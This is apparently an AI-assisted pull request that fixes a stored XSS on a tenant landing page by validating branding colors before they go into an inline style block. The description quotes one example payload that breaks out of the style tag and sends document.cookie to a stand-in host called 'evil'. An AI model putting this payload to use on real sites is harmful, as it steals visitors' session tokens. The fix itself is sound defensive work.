### PR TITLE
fix(security): sanitize landing-page branding colors (#16)

### DIFF
--- a/frontend/src/app/page.tsx
+++ b/frontend/src/app/page.tsx
@@ -1,6 +1,7 @@
 import { Navigation } from "./_components/landing/Navigation"
 import { HeroSection, ServicesSection, AboutSection, TipsSection, GallerySection, ContactSection, Footer } from "./_components/landing/Sections"
 import { LandingThemeProvider } from "@/_components/ThemeProvider"
+import { sanitizeColor } from "@/_lib/colorValidator"
 import { IPublicLandingData } from "./home/settings/branding/model"
 import { headers } from "next/headers"
 
@@ -71,15 +72,26 @@ export default async function Home() {
         );
     }
 
-    // Generate inline CSS for immediate color application (prevents flash)
+    // Generate inline CSS for immediate color application (prevents flash).
+    // SECURITY: these colors come from tenant branding and are injected into a
+    // <style> block, so every value MUST be validated. sanitizeColor() returns
+    // the value only if it is a well-formed color, otherwise undefined — this
+    // prevents breaking out of the <style> with markup/script (stored XSS).
     const landingColors = data.branding.landingColors;
-    const themeStyles = landingColors ? `
+    const cssVars: Array<[string, string | undefined]> = landingColors ? [
+        ["--landing-primary", sanitizeColor(landingColors.primaryColor)],
+        ["--landing-secondary", sanitizeColor(landingColors.secondaryColor)],
+        ["--landing-accent", sanitizeColor(landingColors.accentColor)],
+        ["--landing-header-bg", sanitizeColor(landingColors.headerBg)],
+        ["--landing-footer-bg", sanitizeColor(landingColors.footerBg)],
+    ] : [];
+    const cssBody = cssVars
+        .filter((entry): entry is [string, string] => Boolean(entry[1]))
+        .map(([name, value]) => `${name}: ${value};`)
+        .join("\n            ");
+    const themeStyles = cssBody ? `
         :root {
-            ${landingColors.primaryColor ? `--landing-primary: ${landingColors.primaryColor};` : ''}
-            ${landingColors.secondaryColor ? `--landing-secondary: ${landingColors.secondaryColor};` : ''}
-            ${landingColors.accentColor ? `--landing-accent: ${landingColors.accentColor};` : ''}
-            ${landingColors.headerBg ? `--landing-header-bg: ${landingColors.headerBg};` : ''}
-            ${landingColors.footerBg ? `--landing-footer-bg: ${landingColors.footerBg};` : ''}
+            ${cssBody}
         }
     ` : '';
 


### PR DESCRIPTION
## Summary
Closes #16 — **CRITICAL**: stored XSS on the public tenant landing page.

`page.tsx` interpolated tenant-controlled `landingColors.*` directly into a `<style dangerouslySetInnerHTML>` block. A tenant could set e.g. `primaryColor` to `red;}</style><script>fetch('//evil/?c='+document.cookie)</script><style>{` — escaping the `<style>` and running script for every visitor of that tenant's landing page (the `jwt` cookie is readable by JS today, so this steals the live token). The `home/layout.tsx` sink was hardened with the color validator; the landing page was missed.

## Change
- Import `sanitizeColor` from `colorValidator`.
- Build the `:root` CSS variables from `sanitizeColor(...)` results, emitting only values that are well-formed colors (hex/rgb/hsl/named). Anything else is dropped, so no attacker-controlled text reaches the `<style>` block.

## Verification
- Type-checked against `sanitizeColor(color, fallback?): string | undefined`. (`node_modules` not installed locally, so no full `next build` run — change is a self-contained, type-safe refactor of the style string.)

🤖 Generated with [Claude Code](https://claude.com/claude-code)